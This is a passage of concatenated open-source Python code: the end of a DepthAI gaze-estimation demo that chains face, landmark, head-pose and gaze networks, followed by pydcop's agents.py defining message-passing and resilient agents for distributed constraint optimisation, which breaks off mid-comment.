pose_nn_xout = pipeline.createXLinkOut()
pose_nn_xout.setStreamName("pose_nn")
pose_nn.out.link(pose_nn_xout.input)
# NeuralNetwork
print("Creating Gaze Estimation Neural Network...")
gaze_nn = pipeline.createNeuralNetwork()
gaze_nn.setBlobPath(
str(Path("models/gaze-estimation-adas-0002/gaze-estimation-adas-0002_openvino_2020.1_4shave.blob").resolve().absolute())
)
gaze_nn_xin = pipeline.createXLinkIn()
gaze_nn_xin.setStreamName("gaze_in")
gaze_nn_xin.out.link(gaze_nn.input)
gaze_nn_xout = pipeline.createXLinkOut()
gaze_nn_xout.setStreamName("gaze_nn")
gaze_nn.out.link(gaze_nn_xout.input)
return pipeline
class Main:
def __init__(self, device):
self.device = device
print("Starting pipeline...")
self.device.startPipeline()
if camera:
self.cam_out = self.device.getOutputQueue("cam_out")
else:
self.face_in = self.device.getInputQueue("face_in")
if not camera:
self.cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
self.frame = None
self.face_box_q = queue.Queue()
self.bboxes = []
self.left_bbox = None
self.right_bbox = None
self.nose = None
self.pose = None
self.gaze = None
self.running = True
self.fps = FPS()
self.fps.start()
def face_thread(self):
face_nn = self.device.getOutputQueue("face_nn")
landmark_in = self.device.getInputQueue("landmark_in")
pose_in = self.device.getInputQueue("pose_in")
while self.running:
if self.frame is None:
continue
try:
bboxes = np.array(face_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
bboxes = bboxes.reshape((bboxes.size // 7, 7))
self.bboxes = bboxes[bboxes[:, 2] > 0.7][:, 3:7]
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
det_frame = self.frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
land_data = depthai.NNData()
land_data.setLayer("0", to_planar(det_frame, (48, 48)))
landmark_in.send(land_data)
pose_data = depthai.NNData()
pose_data.setLayer("data", to_planar(det_frame, (60, 60)))
pose_in.send(pose_data)
self.face_box_q.put(bbox)
def land_pose_thread(self):
landmark_nn = self.device.getOutputQueue(name="landmark_nn", maxSize=1, blocking=False)
pose_nn = self.device.getOutputQueue(name="pose_nn", maxSize=1, blocking=False)
gaze_in = self.device.getInputQueue("gaze_in")
while self.running:
try:
land_in = landmark_nn.get().getFirstLayerFp16()
except RuntimeError as ex:
continue
try:
face_bbox = self.face_box_q.get(block=True, timeout=100)
except queue.Empty:
continue
self.face_box_q.task_done()
left = face_bbox[0]
top = face_bbox[1]
face_frame = self.frame[face_bbox[1]:face_bbox[3], face_bbox[0]:face_bbox[2]]
land_data = frame_norm(face_frame, land_in)
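            # Landmarks are relative to the face crop; shift them back into
            # full-frame coordinates.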
land_data[::2] += left
land_data[1::2] += top
left_bbox = padded_point(land_data[:2], padding=30, frame_shape=self.frame.shape)
if left_bbox is None:
print("Point for left eye is corrupted, skipping nn result...")
continue
self.left_bbox = left_bbox
right_bbox = padded_point(land_data[2:4], padding=30, frame_shape=self.frame.shape)
if right_bbox is None:
print("Point for right eye is corrupted, skipping nn result...")
continue
self.right_bbox = right_bbox
self.nose = land_data[4:6]
left_img = self.frame[self.left_bbox[1]:self.left_bbox[3], self.left_bbox[0]:self.left_bbox[2]]
right_img = self.frame[self.right_bbox[1]:self.right_bbox[3], self.right_bbox[0]:self.right_bbox[2]]
try:
# The output of pose_nn is in YPR format, which is the required sequence input for pose in gaze
# https://docs.openvinotoolkit.org/2020.1/_models_intel_head_pose_estimation_adas_0001_description_head_pose_estimation_adas_0001.html
# https://docs.openvinotoolkit.org/latest/omz_models_model_gaze_estimation_adas_0002.html
# ... three head pose angles – (yaw, pitch, and roll) ...
values = to_tensor_result(pose_nn.get())
self.pose = [
values['angle_y_fc'][0][0],
values['angle_p_fc'][0][0],
values['angle_r_fc'][0][0]
]
except RuntimeError as ex:
continue
gaze_data = depthai.NNData()
gaze_data.setLayer("left_eye_image", to_planar(left_img, (60, 60)))
gaze_data.setLayer("right_eye_image", to_planar(right_img, (60, 60)))
gaze_data.setLayer("head_pose_angles", self.pose)
gaze_in.send(gaze_data)
def gaze_thread(self):
gaze_nn = self.device.getOutputQueue("gaze_nn")
while self.running:
try:
self.gaze = np.array(gaze_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
def should_run(self):
if self.running:
return True if camera else self.cap.isOpened()
else:
return False
def get_frame(self, retries=0):
if camera:
return True, np.array(self.cam_out.get().getData()).reshape((3, 300, 300)).transpose(1, 2, 0).astype(np.uint8)
else:
read_correctly, new_frame = self.cap.read()
if not read_correctly or new_frame is None:
if retries < 5:
return self.get_frame(retries+1)
else:
print("Source closed, terminating...")
return False, None
else:
return read_correctly, new_frame
def run(self):
self.threads = [
threading.Thread(target=self.face_thread),
threading.Thread(target=self.land_pose_thread),
threading.Thread(target=self.gaze_thread)
]
for thread in self.threads:
thread.start()
while self.should_run():
try:
read_correctly, new_frame = self.get_frame()
except RuntimeError:
continue
if not read_correctly:
break
self.fps.update()
self.frame = new_frame
self.debug_frame = self.frame.copy()
if not camera:
nn_data = depthai.NNData()
nn_data.setLayer("data", to_planar(self.frame, (300, 300)))
self.face_in.send(nn_data)
if debug: # face
if self.gaze is not None and self.left_bbox is not None and self.right_bbox is not None:
re_x = (self.right_bbox[0] + self.right_bbox[2]) // 2
re_y = (self.right_bbox[1] + self.right_bbox[3]) // 2
le_x = (self.left_bbox[0] + self.left_bbox[2]) // 2
le_y = (self.left_bbox[1] + self.left_bbox[3]) // 2
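                    # The gaze network returns a 3D direction vector; scale its
                    # x/y components into a pixel offset to draw from each eye centre.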
x, y = (self.gaze * 100).astype(int)[:2]
if args.lazer:
beam_img = np.zeros(self.debug_frame.shape, np.uint8)
for t in range(10)[::-2]:
cv2.line(beam_img, (re_x, re_y), ((re_x + x*100), (re_y - y*100)), (0, 0, 255-t*10), t*2)
cv2.line(beam_img, (le_x, le_y), ((le_x + x*100), (le_y - y*100)), (0, 0, 255-t*10), t*2)
self.debug_frame |= beam_img
else:
cv2.arrowedLine(self.debug_frame, (le_x, le_y), (le_x + x, le_y - y), (255, 0, 255), 3)
cv2.arrowedLine(self.debug_frame, (re_x, re_y), (re_x + x, re_y - y), (255, 0, 255), 3)
if not args.lazer:
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
cv2.rectangle(self.debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (10, 245, 10), 2)
if self.nose is not None:
cv2.circle(self.debug_frame, (self.nose[0], self.nose[1]), 2, (0, 255, 0), thickness=5, lineType=8, shift=0)
if self.left_bbox is not None:
cv2.rectangle(self.debug_frame, (self.left_bbox[0], self.left_bbox[1]), (self.left_bbox[2], self.left_bbox[3]), (245, 10, 10), 2)
if self.right_bbox is not None:
cv2.rectangle(self.debug_frame, (self.right_bbox[0], self.right_bbox[1]), (self.right_bbox[2], self.right_bbox[3]), (245, 10, 10), 2)
if self.pose is not None and self.nose is not None:
draw_3d_axis(self.debug_frame, self.pose, self.nose)
if camera:
cv2.imshow("Camera view", self.debug_frame)
else:
aspect_ratio = self.frame.shape[1] / self.frame.shape[0]
cv2.imshow("Video view", cv2.resize(self.debug_frame, (int(900), int(900 / aspect_ratio))))
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
break
self.fps.stop()
print("FPS: {:.2f}".format(self.fps.fps()))
if not camera:
self.cap.release()
cv2.destroyAllWindows()
for i in range(1, 5): # https://stackoverflow.com/a/25794701/5494277
cv2.waitKey(1)
self.running = False
with depthai.Device(create_pipeline()) as device:
app = Main(device)
# Register a graceful CTRL+C shutdown
def signal_handler(sig, frame):
app.running = False
signal.signal(signal.SIGINT, signal_handler)
app.run()
for thread in app.threads:
thread.join()
|
agents.py
|
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Base 'Agent' classes.
An Agent instance is a stand-alone autonomous object. It hosts computations,
which send messages to each other.
Each agent has its own thread, which is used to handle messages as they are
dispatched to computations hosted on this agent.
"""
import logging
import sys
import threading
import traceback
import random
from functools import partial
from importlib import import_module
from threading import Thread
from time import perf_counter, sleep
from typing import Dict, List, Optional, Union, Callable, Tuple
from collections import defaultdict
from pydcop.algorithms import AlgorithmDef, ComputationDef, load_algorithm_module
from pydcop.dcop.objects import AgentDef, create_binary_variables
from pydcop.dcop.objects import BinaryVariable
from pydcop.dcop.relations import Constraint
from pydcop.infrastructure.Events import event_bus
from pydcop.infrastructure.communication import Messaging, \
CommunicationLayer, UnreachableAgent
from pydcop.infrastructure.computations import MessagePassingComputation, \
build_computation
from pydcop.infrastructure.discovery import Discovery, UnknownComputation, \
UnknownAgent, _is_technical
from pydcop.infrastructure.ui import UiServer
from pydcop.reparation import create_computation_hosted_constraint, \
create_agent_capacity_constraint, create_agent_hosting_constraint, \
create_agent_comp_comm_constraint
class AgentException(Exception):
pass
class Agent(object):
"""
Object representing an agent.
    An agent communicates with other agents through messages, using a
    `CommunicationLayer`.
    An agent hosts message passing computations and runs these computations on
    its own thread.
Notes
-----
    An agent does not necessarily need to know its own definition (see
    agent_def argument) but it needs it for some uses, like replication in
    resilient DCOP.
Parameters
----------
name: str
name of the agent
comm: CommunicationLayer
object used to send and receive messages
agent_def: AgentDef
definition of this agent, optional
ui_port: int
the port on which to run the ui-server. If not given, no ui-server is
started.
delay: int
An optional delay between message delivery, in second. This delay
only applies to algorithm's messages and is useful when you want to
observe (for example with the GUI) the behavior of the algorithm at
runtime.
daemon: boolean
indicates if the agent should use a daemon thread (defaults to False)
See Also
--------
MessagePassingComputation, CommunicationLayer
"""
def __init__(self, name,
comm: CommunicationLayer,
agent_def: AgentDef=None,
ui_port: int=None,
delay: float=None,
daemon: bool=False):
self._name = name
self.agent_def = agent_def
self.logger = logging.getLogger('pydcop.agent.' + name)
self.agt_metrics = AgentMetrics()
# Setup communication and discovery
self._comm = comm
self.discovery = Discovery(self._name, self.address)
self._comm.discovery = self.discovery
self._messaging = Messaging(name, comm, delay=delay)
self.discovery.discovery_computation.message_sender = \
self._messaging.post_msg
# Ui server
self._ui_port = ui_port
self._ui_server = None
self.t = Thread(target=self._run, name='thread_'+name)
self.t.daemon = daemon
self._stopping = threading.Event()
self._shutdown = threading.Event()
self._running = False
        # _idle means that we have finished handling all incoming messages
self._idle = False
self._computations = {} # type: Dict[str, MessagePassingComputation]
self.t_active = 0
        # time when the first non-technical computation is run
self._run_t = None
# time when starting the agent
self._start_t = None
# Tasks that must run periodically as {callable: (period, last_run)}
self._periodic_cb = {} # type: Dict[Callable, Tuple[float, float]]
# List of paused computations, any computation whose name is in this
# list will not receive any message.
self.paused_computations = []
@property
def communication(self)-> CommunicationLayer:
"""
The communication used by this agent.
Returns
-------
CommunicationLayer
The communication used by this agent.
"""
return self._comm
def add_computation(self, computation: MessagePassingComputation,
comp_name=None, publish=True):
"""
Add a computation to the agent.
        The computation will run on this agent's thread and receive messages
        through its Messaging and CommunicationLayer.
Parameters
----------
computation: a MessagePassingComputation
the computation to be added
comp_name: str
an optional name for the computation, if not given
computation.name will be used.
publish: bool
            True (default) if the computation must be published on the
discovery service.
"""
comp_name = computation.name if comp_name is None else comp_name
self.logger.debug('Add computation %s - %s ',
comp_name, self._messaging)
computation.message_sender = self._messaging.post_msg
computation.periodic_action_handler = self
self._computations[comp_name] = computation
self.discovery.register_computation(comp_name, self.name,self.address,
publish=publish)
# start lookup for agent hosting a neighbor computation
if hasattr(computation, 'computation_def') and \
computation.computation_def is not None:
for n in computation.computation_def.node.neighbors:
self.discovery.subscribe_computation(n)
if hasattr(computation, '_on_value_selection'):
computation._on_value_selection = notify_wrap(
computation._on_value_selection,
partial(self._on_computation_value_changed, computation.name))
if hasattr(computation, '_on_new_cycle'):
computation._on_new_cycle = notify_wrap(
computation._on_new_cycle,
partial(self._on_computation_new_cycle, computation.name))
computation.finished = notify_wrap(
computation.finished,
partial(self._on_computation_finished, computation.name))
event_bus.send("agents.add_computation."+self.name,
(self.name, computation))
def remove_computation(self, computation: str) -> None:
"""
Removes a computation from the agent.
Parameters
----------
computation: str
the name of the computation
Raises
------
UnknownComputation
If there is no computation with this name on this agent
"""
try:
comp = self._computations.pop(computation)
except KeyError:
self.logger.error(
                'Removing unknown computation %s - current computations : %s',
computation, self._computations)
raise UnknownComputation(computation)
if comp.is_running:
comp.stop()
self.logger.debug('Removing computation %s', comp)
self.discovery.unregister_computation(computation, self.name)
event_bus.send("agents.rem_computation."+self.name,
(self.name, computation))
def computations(self, include_technical=False)-> \
List[MessagePassingComputation]:
"""
Computations hosted on this agent.
Parameters
----------
include_technical: bool
If True, technical computations (like discovery, etc.) are
included in the list.
Returns
-------
List[MessagePassingComputation]
A list of computations hosted on this agents. This list is a copy
and can be safely modified.
"""
if include_technical:
return list(self._computations.values())
else:
return [c for c in self._computations.values()
if not c.name.startswith('_')]
def computation(self, name: str) -> MessagePassingComputation:
"""
Get a computation hosted by this agent.
Parameters
----------
name: str
The name of the computation.
Returns
-------
        The MessagePassingComputation corresponding to the given name.
Raises
------
UnknownComputation
if the agent has no computation with this name.
See Also
--------
add_computation
"""
try:
return self._computations[name]
except KeyError:
self.logger.error('unknown computation %s', name)
raise UnknownComputation('unknown computation ' + name)
@property
def address(self):
"""
The address this agent can be reached at.
The type of the address depends on the instance and type of the
CommunicationLayer used by this agent.
Returns
-------
The address this agent can be reached at.
"""
return self._comm.address
def start(self, run_computations = False):
"""
Starts the agent.
        Once started, an agent will dispatch any received message to the
corresponding target computation.
Notes
-----
        Each agent has its own thread; this will start the agent's thread,
        run the _on_start callback and wait for messages. Incoming messages are
added to a queue and handled by calling the _handle_message callback.
The agent (and its thread) will stop once stop() has been called and
        it has finished handling the current message, if any.
See Also
--------
_on_start(), stop()
"""
if self.is_running:
raise AgentException('Cannot start agent {}, already running '
.format(self.name))
self.logger.info('Starting agent %s ', self.name)
self._running = True
self.run_computations = run_computations
self._start_t = perf_counter()
self.t.start()
def run(self, computations: Optional[Union[str, List[str]]]=None):
"""
Run computations hosted on this agent.
Notes
-----
        Attempting to start an already running computation is harmless: it
will be logged but will not raise an exception.
        The first time this method is called, a timestamp is stored, which is used
as a reference when computing metrics.
Parameters
----------
computations: Optional[Union[str, List[str]]]
An optional computation name or list of computation names. If None,
all computations hosted on this agent are started.
Raises
------
AgentException
If the agent was not started (using agt.start()) before calling
run().
UnknownComputation
If some of the computations are not hosted on this agent. All
computations really hosted on the agent are started before raising
this Exception.
"""
if not self.is_running:
raise AgentException('Cannot start computation on agent %s which '
'is not started', self.name)
if computations is None:
self.logger.info('Starting all computations')
else:
if isinstance(computations, str):
computations = [computations]
else:
# avoid modifying caller's variable
computations = computations[:]
self.logger.info('Starting computations %s', computations)
if self._run_t is None:
# We start counter time only when the first computation is run,
# to avoid counting idle time when we wait for orders.
self._run_t = perf_counter()
on_start_t = perf_counter()
for c in list(self._computations.values()):
if computations is None:
if c.is_running:
self.logger.debug(f'Do not start computation {c.name}, already '
'running')
else:
c.start()
elif c.name in computations:
if c.is_running:
self.logger.debug(f'Do not start computation {c.name}, already '
'running')
else:
c.start()
computations.remove(c.name)
# add the time spent in on_start to the active time of the agent.
self.t_active += perf_counter() - on_start_t
if computations:
raise UnknownComputation('Could not start unknown computation %s',
computations)
@property
def start_time(self)-> float:
"""
float:
            timestamp of the first call to run(). This timestamp is
used as a reference when computing various time-related metrics.
"""
return self._run_t
def clean_shutdown(self):
"""
Perform a clean shutdown of the agent.
All pending messages are handled before stopping the agent thread.
This method returns immediately, use `join` to wait until the agent's
thread has stopped.
"""
self.logger.debug('Clean shutdown requested')
self._shutdown.set()
self._messaging.shutdown()
def stop(self):
"""
Stops the agent
        A computation cannot be interrupted while it handles a message;
        as a consequence the agent (and its thread) will stop once it has
finished handling the current message, if any.
"""
self.logger.debug('Stop requested on %s', self.name)
self._stopping.set()
def pause_computations(self, computations: Union[str, Optional[List[str]]]):
"""
Pauses computations.
Parameters
----------
computations: Union[str, Optional[List[str]]]
            The name of the computation to pause, or a list of computation
            names. If None, all hosted computations will be paused.
Raises
------
AgentException
If the agent was not started (using agt.start()) before calling
pause_computations().
UnknownComputation
If some of the computations are not hosted on this agent. All
computations really hosted on the agent are paused before raising
this exception.
"""
if not self.is_running:
raise AgentException('Cannot pause computations on agent %s which '
'is not started')
if computations is None:
self.logger.info('Pausing all computations')
else:
if isinstance(computations, str):
computations = [computations]
else:
computations = computations[:]
self.logger.info('Pausing computations %s', computations)
for c in self._computations.values():
if computations is None:
if c.is_paused:
self.logger.warning('Cannot pause computation %s, already '
'paused', c.name)
else:
c.pause(True)
elif c.name in computations:
if c.is_paused:
self.logger.warning('Cannot pause computation %s, already '
'paused', c.name)
else:
c.pause(True)
computations.remove(c.name)
if computations:
raise UnknownComputation('Could not pause unknown computation %s',
computations)
def unpause_computations(self,
computations: Union[str, Optional[List[str]]]):
"""
Un-pause (i.e. resume) computations
Parameters
----------
        computations: Union[str, Optional[List[str]]]
            The name of the computation to resume, or a list of computation
            names. If None, all hosted computations will be resumed.
Raises
------
AgentException
If the agent was not started (using agt.start()) before calling
unpause_computations().
UnknownComputation
If some of the computations are not hosted on this agent. All
computations really hosted on the agent are resumed before raising
this exception.
"""
if not self.is_running:
raise AgentException('Cannot resume computations on agent %s which '
'is not started')
if computations is None:
self.logger.info('Resuming all computations')
else:
if isinstance(computations, str):
computations = [computations]
else:
computations = computations[:]
self.logger.info('Resuming computations %s', computations)
for c in self._computations.values():
if computations is None:
if not c.is_paused:
self.logger.warning('Do not resume computation %s, not '
'paused', c.name)
else:
c.pause(False)
elif c.name in computations:
if not c.is_paused:
self.logger.warning('Do not resume computation %s, not '
'paused', c.name)
else:
c.pause(False)
computations.remove(c.name)
if computations:
raise UnknownComputation('Could not resume unknown computation %s',
computations)
@property
def name(self):
"""
str:
The name of the agent.
"""
return self._name
@property
def is_stopping(self)-> bool:
"""
bool:
True if the agent is currently stopping (i.e. handling its last
message).
"""
return self._stopping.is_set()
@property
def is_running(self):
"""
bool:
True if the agent is currently running.
"""
return self._running
def join(self):
self.t.join()
def _on_start(self):
"""
This method is called when the agent starts.
Notes
-----
This method is meant to be overwritten in subclasses that might need to
perform some operations on startup. Do NOT forget to call
        `super()._on_start()`! When `super()._on_start()` returns `False`,
        you must also return `False`!
This method is always run in the agent's thread, even though the
        `start()` method is called from another thread.
Returns
-------
status: boolean
True if all went well, False otherwise
"""
self.logger.debug('on_start for {}'.format(self.name))
if self._ui_port:
event_bus.enabled = True
self._ui_server = UiServer(self, self._ui_port)
self.add_computation(self._ui_server, publish=False)
self._ui_server.start()
else:
self.logger.debug('No ui server for %s', self.name)
self._computations[self.discovery.discovery_computation.name] = \
self.discovery.discovery_computation
while True:
            # Check _stopping: do not prevent the agent from stopping!
if self._stopping.is_set():
return False
try:
self.discovery.register_computation(
self.discovery.discovery_computation.name,
self.name, self.address)
except UnreachableAgent:
self.logger.warning("Could not reach directory, will retry "
"later")
sleep(1)
else:
break
self.discovery.register_agent(self.name, self.address)
self.discovery.discovery_computation.start()
return True
def _on_stop(self):
"""
This method is called when the agent has stopped.
It is meant to be overwritten in subclasses that might need to
perform some operations on stop, however, when overwriting it,
you MUST call `super()._on_stop()`.
Notes
-----
        This method always runs in the agent's thread. Messages can still be
        sent from this method, but no new message will be received (as the
        agent's thread has stopped).
"""
self.logger.debug('on_stop for %s with computations %s ',
self.name, self.computations())
# Unregister computations and agent from discovery.
# This will also unregister any discovery callbacks this agent may still
# have.
for comp in self.computations():
comp.stop()
if not _is_technical(comp.name):
try:
self.discovery.unregister_computation(comp.name)
except UnreachableAgent:
# when stopping the agent, the orchestrator / directory might have
# already left.
pass
if self._ui_server:
self._ui_server.stop()
try:
# Wait a bit to make sure that the stopped message can reach the
# orchestrator before unregistration.
sleep(0.5)
self.discovery.unregister_agent(self.name)
except UnreachableAgent:
# when stopping the agent, the orchestrator / directory might have
# already left.
pass
def _on_computation_value_changed(self, computation: str, value,
cost, cycle):
"""Called when a computation selects a new value """
pass
def _on_computation_new_cycle(self, computation, *args, **kwargs):
"""Called when a computation starts a new cycle"""
pass
def _on_computation_finished(self, computation: str,
*args, **kwargs):
"""
Called when a computation finishes.
This method is meant to be overwritten in sub-classes.
Parameters
----------
computation: str
name of the computation that just ended.
"""
pass
def _handle_message(self, sender_name: str, dest_name: str, msg, t):
# messages are delivered even to computations which have reached their
        # stop condition. It's up to the algorithm to decide if it wants to
# handle the message.
dest = self.computation(dest_name)
dest.on_message(sender_name, msg, t)
def metrics(self):
if self._run_t is None:
activity_ratio = 0
else:
total_t = perf_counter() - self._run_t
activity_ratio = self.t_active / (total_t)
own_computations = { c.name for c in self.computations(include_technical=True)}
m = {
'count_ext_msg': {k: v
for k, v in self._messaging.count_ext_msg.items()
if k in own_computations},
'size_ext_msg': {k: v
for k, v in self._messaging.size_ext_msg.items()
if k in own_computations},
# 'last_msg_time': self._messaging.last_msg_time,
'activity_ratio': activity_ratio,
'cycles': {c.name: c.cycle_count for c in self.computations()}
}
return m
def messages_count(self, computation: str):
return self._messaging.count_ext_msg[computation]
def messages_size(self, computation: str):
return self._messaging.size_ext_msg[computation]
def set_periodic_action(self, period: float, cb: Callable):
"""
Set a periodic action.
The callback `cb` will be called every `period` seconds. The delay
is not strict. The handling of a message is never interrupted,
if it takes longer than `period`, the callback will be delayed and
will only be called once the task has finished.
Parameters
----------
period: float
a period in second
cb: Callable
a callback with no argument
Returns
-------
handle:
An handle that can be used to remove the periodic action.
This handle is actually the callback object itself.
"""
        assert period is not None
        assert cb is not None
self.logger.debug("Add periodic action %s - %s ", period, cb)
self._periodic_cb[cb] = (period, perf_counter())
return cb
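    # Illustrative sketch (an assumption, not part of the original code): a
    # hosted computation could report metrics every 2 seconds with
    #     handle = agent.set_periodic_action(2.0, report_metrics)
    # and cancel the action later with
    #     agent.remove_periodic_action(handle)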
def remove_periodic_action(self, handle):
"""
Remove a periodic action
Parameters
----------
handle:
the handle returned by set_periodic_action
"""
self.logger.debug("Remove action %s ", handle)
self._periodic_cb.pop(handle)
def _run(self):
self.logger.debug('Running agent ' + self._name)
full_msg = None
try:
self._running = True
self._on_start()
if self.run_computations:
self.run()
while not self._stopping.is_set():
# Process messages, if any
full_msg, t = self._messaging.next_msg(0.05)
if full_msg is None:
self._idle = True
if self._shutdown.is_set():
self.logger.info("No message during shutdown, "
"stopping agent thread")
break
else:
current_t = perf_counter()
try:
sender, dest, msg, _ = full_msg
self._idle = False
if not self._stopping.is_set():
self._handle_message(sender, dest, msg, t)
finally:
if self._run_t is not None:
e = perf_counter()
msg_duration = e - current_t
self.t_active += msg_duration
if msg_duration > 1:
self.logger.warning(
'Long message handling (%s) : %s',
msg_duration, msg)
self._process_periodic_action()
except Exception as e:
self.logger.error('Thread %s exits With error : %s \n '
'Was handling message %s ',
self.name, e, full_msg)
self.logger.error(traceback.format_exc())
if hasattr(self, 'on_fatal_error'):
self.on_fatal_error(e)
except: # catch *all* exceptions
e = sys.exc_info()[0]
self.logger.error('Thread exits With un-managed error : %s', e)
self.logger.error(e)
finally:
self._running = False
self._comm.shutdown()
self._on_stop()
self.logger.info('Thread of agent %s stopped', self._name)
def _process_periodic_action(self):
        # Process periodic actions. Only once the agent runs the
        # computations (i.e. self._run_t is not None)
ct = perf_counter()
if self._start_t is not None :
for cb, (p, last_t) in list(self._periodic_cb.items()):
if ct - last_t >= p:
# self.logger.debug('periodic cb %s, %s %s ', cb, ct, last_t)
# Must update the cb entry BEFORE calling the cb, in case
                    # the cb attempts to modify (e.g. remove) its own entry by
# calling remove_periodic_action
self._periodic_cb[cb] = (p, ct)
cb()
def is_idle(self):
"""
Indicate if the agent is idle. An idle agent is an agent which has no
pending messages to handle.
:return: True if the agent is idle, False otherwise
"""
return self._idle
def __str__(self):
return 'Agent: '+self._name
def __repr__(self):
return 'Agent: ' + self._name
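# Hedged usage sketch (an assumption, not part of the original module): typical
# wiring of an Agent, assuming some CommunicationLayer implementation `comm` is
# available (the names below are illustrative only).
#
#     agt = Agent('a1', comm)
#     agt.add_computation(my_computation)   # a MessagePassingComputation
#     agt.start()                           # spawns the agent thread
#     agt.run()                             # runs all hosted computations
#     ...
#     agt.stop()
#     agt.join()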
def notify_wrap(f, cb):
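    # Wrap `f` so that `cb` is called with the same arguments right after each
    # call to `f`; used above to hook agent-level notifications onto
    # computation callbacks.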
def wrapped(*args, **kwargs):
f(*args, **kwargs)
cb(*args, **kwargs)
return wrapped
class AgentMetrics(object):
"""
AgentMetrics listen to events from the event_bus to consolidate metrics.
"""
def __init__(self):
self._computation_msg_rcv = defaultdict(lambda : (0,0))
self._computation_msg_snd = defaultdict(lambda : (0,0))
event_bus.subscribe('computations.message_rcv.*',
self._on_computation_msg_rcv)
event_bus.subscribe('computations.message_snd.*',
self._on_computation_msg_snd)
def computation_msg_rcv(self, computation: str):
return self._computation_msg_rcv[computation]
def computation_msg_snd(self, computation: str):
return self._computation_msg_snd[computation]
def _on_computation_msg_rcv(self, topic: str, msg_event):
computation, msg_size = msg_event
prev_count , prev_size = self._computation_msg_rcv[computation]
self._computation_msg_rcv[computation] = \
prev_count+1, prev_size+ msg_size
def _on_computation_msg_snd(self, topic: str, msg_event):
computation, msg_size = msg_event
prev_count , prev_size = self._computation_msg_snd[computation]
self._computation_msg_snd[computation] = \
prev_count+1, prev_size+ msg_size
from pydcop.computations_graph import constraints_hypergraph as chg
repair_algo = load_algorithm_module('mgm2')
class RepairComputationRegistration(object):
def __init__(self, computation: MessagePassingComputation,
status: str, candidate: str):
self.computation = computation
self.status = status
self.candidate = candidate
class ResilientAgent(Agent):
"""
    An agent that supports resiliency by replicating its computations.
Parameters
----------
name: str
name of the agent
comm: CommunicationLayer
object used to send and receive messages
agent_def: AgentDef
definition of this agent, optional
ui_port: int
the port on which to run the ui-server. If not given, no ui-server is
started.
replication: str
name of the replication algorithm
delay: int
An optional delay between message delivery, in second. This delay
only applies to algorithm's messages and is useful when you want to
observe (for example with the GUI) the behavior of the algorithm at
runtime.
"""
def __init__(self, name: str, comm: CommunicationLayer,
agent_def: AgentDef, replication: str, ui_port=None,
delay: float=None):
super().__init__(name, comm, agent_def, ui_port=ui_port, delay=delay)
self.replication_comp = None
if replication is not None:
self.logger.debug('deploying replication computation %s',
replication)
# DCOP computations will be added to the replication computation
# as they are deployed.
algo_module = import_module('pydcop.replication.{}'
.format(replication))
self.replication_comp = algo_module.build_replication_computation(
self, self.discovery)
# self.add_computation(self.replication_comp)
            # Do not start the computation yet, the agent is not even started
self._repair_computations =\
{} # type: Dict[str, RepairComputationRegistration]
            # the replication level will be set when requested to replicate,
            # by the ReplicateComputationsMessage
self._replication_level = None
# Register notification for when all computations have been
# replicated.
self.replication_comp.replication_done = notify_wrap(
self.replication_comp.replication_done,
self._on_replication_done)
def _on_start(self):
"""
See Also
--------
Agent._on_start
Returns
-------
status
"""
self.logger.debug('Resilient agent on_start')
if not super()._on_start():
return False
if self.replication_comp is not None:
self.add_computation(self.replication_comp)
self.replication_comp.start()
return True
def _on_stop(self):
if self.replication_comp is not None:
self.replication_comp.stop()
self.discovery.unregister_computation(self.replication_comp.name)
super()._on_stop()
def add_computation(self, computation: MessagePassingComputation,
comp_name=None, publish=True):
"""
Add a computation to the agent.
See Also
--------
Agent.add_computation
Parameters
----------
computation
comp_name
publish
Returns
-------
"""
super().add_computation(computation, comp_name, publish)
if self.replication_comp is not None \
and not computation.name.startswith('_')\
and not computation.name.startswith('B'):
# FIXME : find a better way to filter out repair computation than
# looking at the first character (B).
self.replication_comp.add_computation(computation.computation_def,
computation.footprint())
def remove_computation(self, computation: str):
if self.replication_comp is not None \
and not computation.startswith('_'):
self.replication_comp.remove_computation(computation)
super().remove_computation(computation)
def replicate(self, k: int):
if self.replication_comp is not None:
self._replication_level = k
self.replication_comp.replicate(k)
def setup_repair(self, repair_info):
self.logger.info('Setup repair %s', repair_info)
# create computation for the reparation dcop
        # The reparation dcop uses a dcop algorithm where computations map to
        # variables (in order to have another dcop distribution problem) and uses
        # a binary variable for each candidate computation.
# This agent will host one variable-computation for each
# binary variable x_i^m indicating if the candidate computation x_i
# is hosted on this agent a_m. Notice that by construction,
        # the agent already has a replica for all the candidates x_i.
# The reparation dcop includes several constraints and variables:
# Variables
# * one binary variable for each orphaned computation
# Constraints
# * hosted constraints : one for each candidate computation
